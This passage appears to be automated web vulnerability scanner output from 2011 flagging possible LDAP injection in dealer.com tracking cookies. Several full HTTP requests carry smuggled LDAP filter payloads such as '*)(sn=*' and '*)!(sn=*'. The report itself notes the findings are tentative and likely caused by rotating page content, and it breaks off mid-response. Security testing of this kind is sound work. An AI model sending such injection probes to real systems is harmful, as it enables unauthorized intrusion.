Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=d62447ad87cf5458)!(sn=*; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20238
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003619; expires=Mon, 16-Apr-2012 01:26:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSi
...[SNIP]...

1.9. http://www.dealer.com/products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./company/contact/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./company/contact/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads c57a1dde651b3a70)(sn=* and c57a1dde651b3a70)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./company/contact/ cookie. The two requests produced different responses, indicating that the input may be incorporated unsafely into a disjunctive LDAP query. Note that both responses below are the same 404 page: the visible headers differ only in Date, Content-Length (20260 versus 20438) and the Set-Cookie timestamp, and the 404 bodies carry rotating testimonial and ad content that differs between the two captures. This is consistent with the Tentative confidence rating, so the finding should be confirmed manually before being treated as a real injection point.

Request 1

GET /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/search-engine-optimization/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=c57a1dde651b3a70)(sn=*; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003110; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A3%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.54.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20260
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:21:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http
...[SNIP]...

Request 2

GET /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/search-engine-optimization/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=c57a1dde651b3a70)!(sn=*; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003110; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A3%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.54.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20438
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I really enjoy being able to go in and add a page, create the meta data for that page, and immediately have it show up. It has been tremendously helpful for us.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO
...[SNIP]...

1.10. http://www.dealer.com/products/sales-analytics/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/sales-analytics/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/sales-analytics/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/sales-analytics/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./solutions/agencies/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./solutions/oem/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003126; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Fsales-analytics%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.57.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20170
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com's CarFlix videos impressed me a lot because I don't have to go to more than one vendor for my video. </p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
...[SNIP]...

Request 2

GET /products/sales-analytics/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/sales-analytics/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./solutions/agencies/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./solutions/oem/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003126; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Fsales-analytics%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.57.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20305
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdo
...[SNIP]...

1.11. http://www.dealer.com/solutions/agencies/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/agencies/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20166
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/inventory
...[SNIP]...

Request 2

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20125
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
